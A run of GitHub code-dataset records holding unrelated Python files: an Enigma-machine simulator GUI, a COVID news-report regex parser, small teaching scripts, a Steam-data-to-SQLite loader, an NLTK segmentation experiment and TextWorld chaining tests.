DialogWindowChangeRotor_inst = DialogWindowChangeRotor(self, rotor, 1)\n DialogWindowChangeRotor_inst.show()\n DialogWindowChangeRotor_inst.exec()\n\n def rotor3_change(self):\n rotor = self.rotors[2]\n DialogWindowChangeRotor_inst = DialogWindowChangeRotor(self, rotor, 2)\n DialogWindowChangeRotor_inst.show()\n DialogWindowChangeRotor_inst.exec()\n\n def reflector_change(self):\n reflector = self.reflector\n DialogWindowChangeReflector_inst = DialogWindowChangeReflector(self, reflector)\n DialogWindowChangeReflector_inst.show()\n DialogWindowChangeReflector_inst.exec()\n\n def q_plug_change(self):\n text = f'Текущее число подключений: {self.len_plug_board}'\n i, okBtnPressed = QInputDialog.getText(self, \"Количество подключений\",\n text)\n if okBtnPressed:\n try:\n i = int(i)\n if 1 <= i <= len(alphabet) // 2:\n if i == self.len_plug_board:\n return\n else:\n self.len_plug_board = i\n self.plug_board = create_plug_board(self.len_plug_board)\n else:\n return\n except:\n return\n\n def plug_change(self):\n plug_board = self.plug_board\n DialogWindowChangePlug_inst = DialogWindowChangePlug(self, plug_board)\n DialogWindowChangePlug_inst.show()\n DialogWindowChangePlug_inst.exec()\n\n def conf_open(self):\n global alphabet\n del self.plug_board\n fname = QFileDialog.getOpenFileName(self, 'Открыть файл с конфигурацией', '', 'CSV (*.csv)')[0]\n if fname == '':\n return\n if self.Open_Conf_Enable:\n self.Open_Conf_Enable = False\n self.action_Conf_open.setEnabled(False)\n with open(fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n data = list(reader)\n self.rotors[0] = data[0][1], data[0][2], data[0][3]\n self.rotors[1] = data[1][1], data[1][2], data[1][3]\n self.rotors[2] = data[2][1], data[2][2], data[2][3]\n self.reflector = data[3][1]\n self.len_plug_board = data[4][1]\n try:\n board = data[4][2]\n board = [(board[i * 2], board[i * 2 + 1]) for i in range(0, len(board) // 2)]\n self.plug_board = board\n except:\n self.plug_board = []\n alphabet = data[5][0]\n\n def conf_save(self):\n fname = QFileDialog.getSaveFileName(self, 'Сохранить конфигурацию машины', '', 'CSV (*.csv)')[0]\n if fname == '':\n return\n with open(fname, \"w\", newline=\"\") as file:\n zip = self.plug_board\n zip = [list(i) for i in zip]\n zip = ''.join(sum(zip, []))\n table = [['Rotor 1', self.rotors[0][0], self.rotors[0][1], self.rotors[0][2]],\n ['Rotor 2', self.rotors[1][0], self.rotors[1][1], self.rotors[1][2]],\n ['Rotor 3', self.rotors[2][0], self.rotors[2][1], self.rotors[2][2]],\n ['Reflector', self.reflector],\n ['PlugBoard', self.len_plug_board, zip],\n [alphabet]]\n file.truncate()\n writer = csv.writer(file)\n for row in table:\n writer.writerow(row)\n\n # Работа с алфавитами (на стадии тестирования)\n\n def choose_alphabet(self):\n global alphabet\n alphabets = list(self.alphabets.keys())\n choice = tuple([item for item in alphabets if item not in self.used_alphabets])\n\n i, okBtnPressed = QInputDialog.getItem(self, \"Выбор алфавита\",\n \"Выберите алфавит:\",\n choice,\n 1, False)\n if okBtnPressed:\n alphabet = self.alphabets[i]\n self.used_alphabets.append(i)\n self.create_elements()\n if len(alphabets) == len(self.used_alphabets):\n self.action_Choose_alphabet.setEnabled(False)\n\n def add_alphabet_dial(self):\n DialogWindowAddALphabet_inst = DialogWindowAddAlphabet(self)\n DialogWindowAddALphabet_inst.show()\n DialogWindowAddALphabet_inst.exec()\n\n def add_alphabet(self, name, alphabet):\n if len(alphabet) % 2 == 0 and len(alphabet) != 0:\n self.alphabets[name] = alphabet\n self.action_Choose_alphabet.setEnabled(True)\n else:\n return\n\n # Вызов справки\n\n def help(self):\n DialogWindowHelp_inst = DialogWindowHelp()\n DialogWindowHelp_inst.show()\n DialogWindowHelp_inst.exec()\n\n # Cочетания клавиш\n\n def keyPressEvent(self, event):\n if int(event.modifiers()) == Qt.ControlModifier:\n if event.key() == Qt.Key_S:\n self.save_as_file()\n if event.key() == Qt.Key_O:\n self.open_file()\n\n # Работа с машиной\n\n def create_elements(self):\n self.rotors = [random_rotor(), random_rotor(), random_rotor()]\n self.reflector = create_reflector()\n self.plug_board = create_plug_board(self.len_plug_board)\n\n def encrypt(self):\n if self.Open_Conf_Enable:\n self.Open_Conf_Enable = False\n self.action_Conf_open.setEnabled(False)\n self.machine = Machine(self.rotors, self.reflector, self.plug_board)\n text = self.textEdit.toPlainText()\n text = self.machine.encrypt(text)\n self.Encrypted.setText(text)\n del self.machine\n\n\n# Класс ротора машины\n\nclass Rotor:\n perms = []\n turnover_position = ''\n\n def __init__(self, perms, turnover_position, ring_setting):\n self.position = alphabet[0]\n i = alphabet.index(ring_setting)\n perms = perms[i:] + perms[:i]\n self.perms = [c for c in perms]\n self.turnover_position = turnover_position\n\n def set_position(self, position):\n position_change = alphabet.index(position) - alphabet.index(self.position)\n self.position = position\n self.perms = self.perms[position_change:] + self.perms[:position_change]\n\n def turnover(self):\n return True if self.turnover_position == self.position else False\n\n def step(self):\n turnover = self.turnover()\n self.perms = self.perms[1:] + self.perms[:1]\n self.position = alphabet[(alphabet.index(self.position) + 1) % len(alphabet)]\n if turnover:\n return True\n else:\n return False\n\n def encrypt_forward(self, c):\n return self.perms[alphabet.index(c)]\n\n def encrypt_backward(self, c):\n return alphabet[self.perms.index(c)]\n\n\n# Класс рефлектора машины\n\nclass Reflector:\n def __init__(self, pairs):\n self.pairs = {}\n for i, c in enumerate(alphabet):\n self.pairs[c] = pairs[i]\n\n def reflect(self, c):\n return self.pairs[c]\n\n\n# Класс машины\n\nclass Machine:\n rotors = []\n reflector = None\n plug_board = {}\n double_step = False\n\n def __init__(self, rotors, reflector, plug_board):\n self.rotors = [Rotor(rotor[0], rotor[1], rotor[2]) for rotor in rotors]\n self.reflector = Reflector(reflector)\n for pair in plug_board:\n self.plug_board[pair[0]], self.plug_board[pair[1]] = pair[1], pair[0]\n\n def set_rotors(self, positions):\n if len(positions) != len(self.rotors):\n print('Error: rotor settings do not match with number of rotors')\n else:\n [rotor.set_position(positions[i]) for i, rotor in enumerate(self.rotors)]\n return\n\n def encrypt_char(self, c):\n c = self.plug_board[c] if c in self.plug_board else c\n for i, rotor in enumerate(self.rotors[::-1]):\n if i is 0:\n c = rotor.encrypt_forward(c)\n else:\n difference = (alphabet.index(self.rotors[::-1][i - 1].position) - alphabet.index(\n self.rotors[::-1][i].position)) % len(alphabet)\n c = rotor.encrypt_forward(alphabet[alphabet.index(c) - difference])\n c = self.reflector.reflect(c)\n for i, rotor in enumerate(self.rotors):\n if i is 0:\n c = rotor.encrypt_backward(c)\n else:\n difference = (alphabet.index(self.rotors[i - 1].position) - alphabet.index(\n self.rotors[i].position)) % len(alphabet)\n c = rotor.encrypt_backward(alphabet[alphabet.index(c) - difference])\n c = self.plug_board[c] if c in self.plug_board else c\n return c\n\n def status(self):\n return self.rotors[0].position + self.rotors[1].position + self.rotors[2].position\n\n def step(self):\n if self.double_step:\n self.rotors[1].step()\n self.rotors[0].step()\n self.double_step = False\n if self.rotors[2].step():\n self.rotors[1].step()\n if self.rotors[1].turnover():\n self.double_step = True\n\n def encrypt(self, s):\n global alphabet\n out = ''\n for c in s:\n if c.upper() in alphabet:\n self.step()\n if c.isupper():\n out += self.encrypt_char(c)\n else:\n c = c.upper()\n out += self.encrypt_char(c).lower()\n else:\n out += c\n return out\n\n\n# получить случайный ротор\n\ndef random_rotor():\n global alphabet\n rotor = list(alphabet)\n turnover_position = random.choice(rotor)\n ring_setting = random.choice(rotor)\n random.shuffle(rotor)\n rotor = ''.join(rotor)\n rotor = (rotor, turnover_position, ring_setting)\n return rotor\n\n\n# получить случайный рефлектор\n\ndef create_reflector():\n global alphabet\n out = ['_'] * len(alphabet)\n\n for i in range(len(out)):\n if out[i] == '_':\n indexes = []\n for j in range(i + 1, len(out)):\n if out[j] == '_':\n indexes.append(j)\n new_index = random.choice(indexes)\n out[i], out[new_index] = alphabet[new_index], alphabet[i]\n else:\n continue\n\n return ''.join(out)\n\n\n# создать коммутационную панель\n\ndef create_plug_board(quantity):\n global alphabet\n try:\n quantity = int(quantity)\n except:\n return False\n if 0 <= quantity <= 13:\n letters = list(alphabet)\n random.shuffle(letters)\n letters = letters[:quantity * 2]\n plug_board = [(letters[i], letters[i + 1]) for i in range(0, quantity * 2, 2)]\n return plug_board\n else:\n return False\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MainWindow()\n ex.show()\n sys.exit(app.exec_())\n","repo_name":"matv3ys/Easy-Encrypt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21655654405","text":"import regex as re\nimport itertools as iter\nimport sys\nimport csv\nfrom csv import reader\n\n\"\"\"\nprint(\"Nhap du lieu: \\n\")\ninput = sys.stdin.read()\ninput1 = str.splitlines()\n\"\"\"\n\"\"\"\norder = [\"1\",\"2\",\"3\"]\ngender = [\"nam\",\"nữ\",\"nam\",\"nữ\",\"nam\"]\nage = [\"99\",\"101\"]\nfor treble in iter.zip_longest(order, gender, age):\n print(treble)\n\n\"\"\"\nwith open('testfor.csv', 'w+', encoding=\"utf-8\", newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"Thời gian\", \"Trạng thái\", \"Số ca bệnh\",\"Thứ tự ca tử vong\", \"Thứ tự bệnh nhân\", \"Giới tính\", \"Tuổi\",\"Thông tin\"])\n with open('input.csv', 'r', encoding=\"utf-8\") as read_obj:\n csv_reader = reader(read_obj)\n for row in csv_reader:\n r = ','.join(row)\n totp = re.findall(r'^(?:0[0-9]|1[0-9]|2[0-3]):[0-5][0-9]+ +\\d{1,2}\\/\\d{1,2}\\/\\d{4}',r) #thời gian đăng tin\n condition = re.findall(r'(?:MẮC MỚI|TỬ VONG|KHỎI BỆNH|CHỮA KHỎI|DƯƠNG TÍNH)',r) #Tình trạng\n #z = list(map(lambda x: x.lower(),re.findall(r'\\b\\d+ (?=CA BỆNH|CA MẮC|NGƯỜI|TRƯỜNG HỢP|BỆNH NHÂN|CA DƯƠNG TÍNH)',r)))\n status = re.findall(r'\\b\\d+ (?=CA BỆNH|CA MẮC|NGƯỜI|TRƯỜNG HỢP|BỆNH NHÂN|CA DƯƠNG TÍNH)',r)\n condition1 = re.findall(r'(?=(?:THỨ) +(\\d+))\\b',r)\n order = re.findall(r'(?=(?=(?:\\(BN)+(\\d+)\\))|(?=(?:\\(BN) +(\\d+)\\)))',r) #số thứ tự bệnh nhân\n order1 = re.findall(r'(?=(?:\\(BN) +(\\d+)\\))',r)\n sex = re.findall(r'(?:nam|nữ)', r) # giới tính\n age = re.findall(r'(?i)\\b(?=(?:, )(\\d+ tuổi))\\b',r) #tuổi\n info = re.findall(r'(?i)\\b(?:địa chỉ tại|địa chỉ|quốc tịch|ở|quê quán|ngụ tại|địa chỉ ở|tiền sử:|tại)+[ ,:a-zàáãảạâấầẫậăắằẵặơờớởỡợđêếềễểệôốồỗổộùúụủũưừữứửựíìĩỉịỹỷỳýỵ]+[.]',r) #thông tin\n print(order)\n for treble in iter.zip_longest(totp, condition, status, condition1, order, sex, age):#, info):\n with open('testfor.csv', 'w+', encoding=\"utf-8\", newline='') as file:\n writer.writerow(treble)","repo_name":"chungtd89/ncov_moh_retrieve","sub_path":"test/enhanced.py","file_name":"enhanced.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2881313288","text":"\nDic ={}\n\nDic[0] =\"zero\"\nDic[1] =\"one\"\nDic[2] =\"two\"\n\n#print(Dic)\n\n#updating dictionary\nDic[1] =\"One\"\nprint(Dic)\n\n#Iterating dictionary\n\nfor num in Dic:\n print(num)\n\nfor num in Dic.values():\n print(num)\n#keys and valuea\nfor num ,val in Dic.items():\n print(num,\":\",val)\n","repo_name":"ajayeluri/Python","sub_path":"DataType_dic.py","file_name":"DataType_dic.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40763203135","text":"import copy\n\n\ndef lucky_draw_combination(n, m, result=None, all_results=None):\n \"\"\"\n 使用函数的递归(嵌套)调用,找出所有可能的中奖者的组合\n :param all_results: 中奖者的所有组合\n :param n: 参与抽奖的人\n :param result: 抽奖结果\n :param m: 中奖的人数\n :return: None\n \"\"\"\n if result is None:\n result = []\n if all_results is None:\n all_results = []\n if len(result) == m:\n # print(result)\n return all_results.append(result)\n for i in range(len(n)):\n # 从剩下的人中,抽出一个人加入结果\n new_result = copy.copy(result)\n new_result.append(n[i])\n # 每人最多只能被抽中一次,当前被抽中的人之后的人,进入下一次抽奖\n rest_n = n[i + 1: len(n)]\n # 递归调用 在剩下的人中继续抽奖\n lucky_draw_combination(rest_n, m, new_result, all_results)\n return all_results\n\n\nif __name__ == \"__main__\":\n total = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] # 被抽奖人列表\n m_ = [3, 2, 1] # 三等奖、二等奖、一等奖的个数\n lucky1 = lucky_draw_combination(total, m_[0])\n for k1 in lucky1:\n total2 = copy.copy(total)\n for j1 in k1:\n total2.remove(j1)\n lucky2 = lucky_draw_combination(total2, m_[1])\n for k2 in lucky2:\n total3 = copy.copy(total2)\n for j2 in k2:\n total3.remove(j2)\n lucky3 = lucky_draw_combination(total3, m_[2])\n for k3 in lucky3:\n print(k1, k2, k3)\n","repo_name":"qinggeouye/GeekTime","sub_path":"MathematicProgrammer/08_combination/lesson8_2.py","file_name":"lesson8_2.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"24721821233","text":"from cgi import print_form\r\n\r\n\r\na =1\r\nb=99\r\n #Airthmetic Operators(+,-,/,*)\r\nprint(\"SUM IS \", a+b)\r\nprint(\"SUB IS \", a-b)\r\nprint(\"MUL IS \", a*b)\r\nprint(\"DIV IS \", a/b)\r\n\r\n#Assignment Opeartors(=,+=,-=,/=,*=)\r\nA= 5\r\nA+=1\r\nA-=2\r\nA/=2\r\nA*=5\r\nprint(round(A))\r\n\r\n#Comparison Operators(return boolen (True/False)\r\ni = 22>22\r\ni = 22<22\r\ni = 22==22\r\ni = 22>=22\r\ni = 22<=22\r\ni = 22!=22\r\nprint(i)\r\n \r\n#Logical Operators\r\nbool1 = True\r\nboll2= False\r\nprint(\"THe value of bool1 and bool2 is \",(bool1 and boll2))\r\nprint(\"THe value of bool1 or bool2 is \",(bool1 or boll2))\r\nprint(\"THe value of not boll2 is \",(not boll2))","repo_name":"NipunMagotra/Learning-Python","sub_path":"Learning 1.1/2_operators.py","file_name":"2_operators.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73764052214","text":"from multiprocessing import Pool, Process\nfrom imutils.paths import list_files\nfrom datetime import datetime\nimport sqlite3 as sql\nfrom tqdm import tqdm\nimport json\nimport time\nimport os\n\nROOT_PATH = f'/config/workspace/project/DoveNest/informations'\nJSON_PATH = f'{ROOT_PATH}/jsons'\nDB_PATH = f'{ROOT_PATH}/db'\n\nDB_NAME = 'game_informations'\n# DB_NAME = 'test'\nTABLE_NAME = 'games'\n\nload_json = lambda path: json.loads(open(path, 'r').read())\n\nclass _DB:\n \n def __init__(self, db_name, table_name, columns):\n \n self.db_name = db_name\n self.columns = columns\n self.table_name = table_name\n \n self.conn, self.cursor = self.conn_db()\n \n \n def conn_db(self):\n \n conn = sql.connect(f'{DB_PATH}/{self.db_name}.db', timeout = 3600.0)\n cursor = conn.cursor()\n \n return conn, cursor\n \n \n def create_table(self):\n \n query = f'''\n CREATE TABLE IF NOT EXISTS {self.table_name}(\n \n '''\n \n for idx, column in enumerate(self.columns, 1):\n \n name, dtype, is_null = column\n q = f'{name} {dtype}' if is_null == False \\\n else f'{name} {dtype} NOT NULL'\n query += f'\\t{q},\\n' if idx != len(self.columns) \\\n else f'{q})'\n\n self.cursor.execute(query)\n self.conn.commit()\n \n \n def insert_table(self, data_tuple):\n \n q = ''\n for idx, data in enumerate(data_tuple, 1):\n q += '?, ' if idx != len(data_tuple) else '?'\n \n query = f'INSERT INTO {self.table_name} VALUES({q})'\n \n self.cursor.execute(query, data_tuple)\n self.conn.commit()\n \n \n def backup_table(self):\n \n now = datetime.now()\n with self.conn:\n with open(f'{DB_PATH}/{self.db_name}.sql', 'w') as f:\n \n for line in self.conn.iterdump(): f.write('%s\\n' % line)\n print(f'[INFO] [{now}] 테이블 <{self.table_name}> 백업이 완료되었습니다. ')\n\n\ndef save_db(idx, jsons):\n s = time.time()\n\n for json_path in tqdm(jsons):\n \n now = datetime.now()\n try:\n json_data = load_json(json_path)\n appid, name = json_data['steam_appid'], json_data['name']\n DB.insert_table([appid, name, json.dumps(json_data)])\n\n except Exception as e: print(f'[ERR.DB.I-0001] : [{now}] {e}\\n')\n time.sleep(5)\n\n now = datetime.now()\n print(f'[INFO] : [{now}] {idx} DB 저장 완료 ({time.time() - s:,.3f}s)')\n\n\njson_paths = sorted(list_files(JSON_PATH))\nDB = _DB(DB_NAME, TABLE_NAME, [\n ['appid', 'INTEGER', True], \n ['name', 'TEXT', True], \n ['json_data', 'json', True]\n ])\n\nDB.create_table()\nprint(f'[INFO] : [{datetime.now()}]테이블 <{TABLE_NAME}> 생성 완료')\n\n_1st_jobs = json_paths[:len(json_paths) // 4]\n_2nd_jobs = json_paths[len(json_paths) // 4 : len(json_paths) // 2]\n_3rd_jobs = json_paths[len(json_paths) // 2 : 3 * len(json_paths) // 4]\n_4th_jobs = json_paths[3 * len(json_paths) // 4 :]\n\njobs = [_1st_jobs, _2nd_jobs, _3rd_jobs, _4th_jobs]\nstart = time.time()\nprocs = []\n\n\n# print(jobs[0])\nfor idx, job in enumerate(jobs, 1):\n p = Process(target = save_db, args = (idx, job))\n p.start()\n procs.append(p)\n \nfor p in procs: p.join()\n\nnow = datetime.now()\nf'[Done] : [{now}] 수행 시간 : {time.time() - start:,.4f}초'\n\nDB.backup_table()\nDB.conn.close()","repo_name":"EvoDmiK/DoveNest","sub_path":"informations/src/py/json2db.py","file_name":"json2db.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28748460882","text":"# -*- coding: utf8 -*-\nimport sys\nimport glob\nimport util\nimport datetime\nimport random, nltk, math\nimport numpy as np\nfrom nltk.corpus import names\nimport nltk.metrics\nimport collections\nimport crf\nfrom nltk.metrics import *\n\nmaterial = 'data/24s/*'\n#material = \"data/sjw/A05*\"\nsize = 30000 \ntrainportion = 0.9\ndictfile = 'data/vector/24scbow300.txt'\ncrfmethod = \"l2sgd\" # {‘lbfgs’, ‘l2sgd’, ‘ap’, ‘pa’, ‘arow’}\ncharstop = True # True means label attributes to previous char\nfeatures = 1 # 1=discrete; 2=vectors; 3=both\nrandom.seed(101)\n\n#宣告指令式\n\"python runcrf.py 'data/sjw/*' 80 data/vector/vectors300.txt 1 1\"\nargs = sys.argv\nif len(args)>1:\n material = args[1]\n size = int(args[2])\n #dictfile = args[3]\n features = int(args[4])\n charstop = int(args[5])\ncut = int(size*trainportion)\n\n#訓練模型名稱\nmodelname = material.replace('/','').replace('*','')+str(size)+str(charstop)+\".m\"\n\nprint (\"Material:\", material)\nprint (\"Size:\", size, \"entries,\", trainportion, \"as training\")\n\nprint (datetime.datetime.now())\n\n# Prepare li: list of random lines\nif features > 1:\n vdict = util.readvec(dictfile)#先處理文本\n print (\"Dict:\", dictfile)\nli = [line for line in util.file_to_lines(glob.glob(material))]#已經切成陣列\nprint(len(li))\nrandom.shuffle(li)#做亂數取樣\nli = li[:size]\n\n\n# Prepare data: list of x(char), y(label) sequences\ndata = []\nalldata = []\nfor line in li:\n x, y = util.line_toseq(line, charstop)\n #print(x)\n #print(y)\n if features == 1: #可以用\n d = crf.x_seq_to_features_discrete(x, charstop), y\n a = crf.x_seq_to_features_discrete(x, charstop)\n for key in range(len(x)):\n alldata.append((a[key],y[key]))\n \n elif features == 2:\n d = crf.x_seq_to_features_vector(x, vdict, charstop), y\n elif features == 3:\n d = crf.x_seq_to_features_both(x, vdict, charstop), y\n \n #data.append(d)\nprint(data[7])\n#traindata = data[:cut]\n#testdata = data[cut:]\ntraindata = alldata[:cut]\ntestdata = alldata[cut:]\n'''\nclassifier = nltk.NaiveBayesClassifier.train(traindata)\n# 通过测试集来估计分类器的准确性\nprint(nltk.classify.accuracy(classifier, testdata))\n# 如果一个人的名字的最后一个字母是‘a’,那么这个人是男还是女\nclassifier.show_most_informative_features(5)\n\nrefsets = collections.defaultdict(set)\ntestsets = collections.defaultdict(set)\n\nfor i, (feats, label) in enumerate(testdata):\n refsets[label].add(i)\n observed = classifier.classify(feats)\n testsets[observed].add(i)\nprint ('S precision:', nltk.precision(refsets['S'], testsets['S']))\nprint ('S recall:', nltk.recall(refsets['S'], testsets['S']))\nprint ('S F-measure:', nltk.f_measure(refsets['S'], testsets['S']))\nprint ('N precision:', nltk.precision(refsets['N'], testsets['N']))\nprint ('N recall:', nltk.recall(refsets['N'], testsets['N']))\nprint ('N F-measure:', nltk.f_measure(refsets['N'], testsets['N']))\n\n'''\n\n'''\ntrainer = pycrfsuite.Trainer()\n#print trainer.params()\nprint(traindata[0])\nfor t in traindata:\n x, y = t\n \n trainer.append(x, y)\n\ntrainer.select(crfmethod)#做訓練\ntrainer.set('max_iterations',100) #測試迴圈\n#trainer.set('delta',0)\nprint (\"!!!!before train\", datetime.datetime.now())\ntrainer.train(modelname)\nprint (\"!!!!after train\", datetime.datetime.now())\n\n\ntagger = pycrfsuite.Tagger()\n#建立訓練模型檔案\ntagger.open(modelname)\ntagger.dump(modelname+\".txt\")\n\nprint (datetime.datetime.now())\nprint (\"Start testing...\")\nresults = []\nwhile testdata:\n x, yref = testdata.pop()\n yout = tagger.tag(x)\n results.append(util.eval(yref, yout, \"S\"))\n\ntp, fp, fn, tn = zip(*results)\ntp, fp, fn, tn = sum(tp), sum(fp), sum(fn), sum(tn)\n\np, r = tp/(tp+fp), tp/(tp+fn)\nprint (\"Total tokens in Test Set:\", tp+fp+fn+tn)\nprint (\"Total S in REF:\", tp+fn)\nprint (\"Total S in OUT:\", tp+fp)\nprint (\"Presicion:\", p)\nprint (\"Recall:\", r)\nprint (\"*******************F1-score:\", 2*p*r/(p+r))\n\n\nprint (datetime.datetime.now())\nprint (\"Start closed testing...\")\nresults = []\nwhile traindata:\n x, yref = traindata.pop()\n yout = tagger.tag(x)\n results.append(util.eval(yref, yout, \"S\"))\n\ntp, fp, fn, tn = zip(*results)\ntp, fp, fn, tn = sum(tp), sum(fp), sum(fn), sum(tn)\n\np, r = tp/(tp+fp), tp/(tp+fn)\nprint (\"Total tokens in Train Set:\", tp+fp+fn+tn)\nprint (\"Total S in REF:\", tp+fn)\nprint (\"Total S in OUT:\", tp+fp)\nprint (\"Presicion:\", p)\nprint (\"Recall:\", r)\nprint (\"*******************F1-score:\", 2*p*r/(p+r))\nprint (datetime.datetime.now())\n'''","repo_name":"billxu0521/ALSS_tool","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28307088197","text":"from random import *\n\n#AFC\nafcsul = ['Jaguars', 'Titans', 'Colts', 'Texans']\nafcoeste = ['Chargers', 'Broncos', 'Raiders', 'Chiefs']\nafcnorte = ['Steelers', 'Browns', 'Bengals', 'Ravens']\nafcleste = ['Patriots', 'Dolphins', 'Bills', 'Jets']\n\n#NFC\nnfcsul = ['Saints', 'Buccaneers', 'Panthers', 'Falcons']\nnfcoeste = ['Seahaws', 'Rams', 'Cardinals', '49ers']\nnfcnorte = ['Packers', 'Bears', 'Vikings', 'Lions']\nnfcleste = ['Washington', 'Eagles', 'Cowboys', 'Giants']\n\n\nfor i in range(1, 17):\n\ta = chi","repo_name":"argosmaia/UERJ-python","sub_path":"RodadasNFL2.py","file_name":"RodadasNFL2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26158472220","text":"from textworld.generator.data import KnowledgeBase\nfrom textworld.generator.chaining import ChainingOptions, QuestGenerationError\nfrom textworld.generator.chaining import get_chains, sample_quest\nfrom textworld.logic import GameLogic, Proposition, State, Variable\n\nimport numpy.testing as npt\n\n\ndef build_state(locked_door=False):\n # Set up a world with two rooms and a few objecs.\n P = Variable(\"P\")\n I = Variable(\"I\")\n bedroom = Variable(\"bedroom\", \"r\")\n kitchen = Variable(\"kitchen\", \"r\")\n rusty_key = Variable(\"rusty key\", \"k\")\n small_key = Variable(\"small key\", \"k\")\n wooden_door = Variable(\"wooden door\", \"d\")\n chest = Variable(\"chest\", \"c\")\n cabinet = Variable(\"cabinet\", \"c\")\n robe = Variable(\"robe\", \"o\")\n\n state = State(KnowledgeBase.default().logic, [\n Proposition(\"at\", [P, bedroom]),\n Proposition(\"south_of\", [kitchen, bedroom]),\n Proposition(\"north_of\", [bedroom, kitchen]),\n Proposition(\"link\", [bedroom, wooden_door, kitchen]),\n Proposition(\"link\", [kitchen, wooden_door, bedroom]),\n\n Proposition(\"locked\" if locked_door else \"closed\", [wooden_door]),\n\n Proposition(\"in\", [rusty_key, I]),\n Proposition(\"match\", [rusty_key, chest]),\n Proposition(\"locked\", [chest]),\n Proposition(\"at\", [chest, kitchen]),\n Proposition(\"in\", [small_key, chest]),\n\n Proposition(\"match\", [small_key, cabinet]),\n Proposition(\"locked\", [cabinet]),\n Proposition(\"at\", [cabinet, bedroom]),\n Proposition(\"in\", [robe, cabinet]),\n ])\n\n return state\n\n\ndef test_chaining():\n # The following test depends on the available rules,\n # so instead of depending on what is in rules.txt,\n # we define the allowed_rules to used.\n allowed_rules = KnowledgeBase.default().rules.get_matching(\"take/.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"go.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"insert.*\", \"put.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"open.*\", \"close.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"lock.*\", \"unlock.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"eat.*\")\n\n class Options(ChainingOptions):\n def get_rules(self, depth):\n return allowed_rules\n\n options = Options()\n options.max_depth = 5\n options.max_length = 5\n\n # No possible action since the wooden door is locked and\n # the player doesn't have the key.\n state = build_state(locked_door=True)\n chains = list(get_chains(state, options))\n assert len(chains) == 0\n\n # Since there are no chains, trying to sample a quest will raise an error.\n npt.assert_raises(QuestGenerationError, sample_quest, state, options)\n\n # The door is now closed instead of locked.\n state = build_state(locked_door=False)\n chains = list(get_chains(state, options))\n assert len(chains) == 5\n\n # With more depth.\n state = build_state(locked_door=False)\n options.max_depth = 20\n options.max_length = 20\n chains = list(get_chains(state, options))\n assert len(chains) == 9\n\n\ndef test_applying_actions():\n state = build_state(locked_door=False)\n options = ChainingOptions()\n options.backward = True\n options.max_depth = 5\n chains = list(get_chains(state, options))\n\n expected_state = state\n for chain in chains:\n state = chain.initial_state.copy()\n for action in chain.actions:\n assert state.apply(action)\n\n assert expected_state == state\n\n\ndef test_going_through_door():\n P = Variable(\"P\", \"P\")\n room = Variable(\"room\", \"r\")\n kitchen = Variable(\"kitchen\", \"r\")\n state = State(KnowledgeBase.default().logic)\n state.add_facts([\n Proposition(\"at\", [P, room]),\n Proposition(\"north_of\", [kitchen, room]),\n Proposition(\"free\", [kitchen, room]),\n Proposition(\"free\", [room, kitchen]),\n Proposition(\"south_of\", [room, kitchen])\n ])\n\n options = ChainingOptions()\n options.backward = True\n options.max_depth = 3\n options.max_length = 3\n options.subquests = True\n options.create_variables = True\n options.rules_per_depth = [\n [KnowledgeBase.default().rules[\"take/c\"], KnowledgeBase.default().rules[\"take/s\"]],\n KnowledgeBase.default().rules.get_matching(\"go.*\"),\n [KnowledgeBase.default().rules[\"open/d\"]],\n ]\n\n chains = list(get_chains(state, options))\n assert len(chains) == 18\n # print()\n # for i, chain in enumerate(chains):\n # actions = [\"{}({})\".format(n.action.name, \", \".join(v.name for v in n.action.variables)) for n in chain.nodes[::-1]]\n # msg = \" -> \".join(actions)\n # print(\"{:2d}. {}\".format(i + 1, msg))\n #\n # 1. take/c(P, room, c_0, o_0, I)\n # 2. take/c(P, room, c_0, o_0, I) -> go/north(P, r_0, room)\n # 3. take/c(P, room, c_0, o_0, I) -> go/north(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 4. take/c(P, room, c_0, o_0, I) -> go/south(P, kitchen, room)\n # 5. take/c(P, room, c_0, o_0, I) -> go/south(P, kitchen, room) -> open/d(P, kitchen, d_0, room)\n # 6. take/c(P, room, c_0, o_0, I) -> go/east(P, r_0, room)\n # 7. take/c(P, room, c_0, o_0, I) -> go/east(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 8. take/c(P, room, c_0, o_0, I) -> go/west(P, r_0, room)\n # 9. take/c(P, room, c_0, o_0, I) -> go/west(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 10. take/s(P, room, s_0, o_0, I)\n # 11. take/s(P, room, s_0, o_0, I) -> go/north(P, r_0, room)\n # 12. take/s(P, room, s_0, o_0, I) -> go/north(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 13. take/s(P, room, s_0, o_0, I) -> go/south(P, kitchen, room)\n # 14. take/s(P, room, s_0, o_0, I) -> go/south(P, kitchen, room) -> open/d(P, kitchen, d_0, room)\n 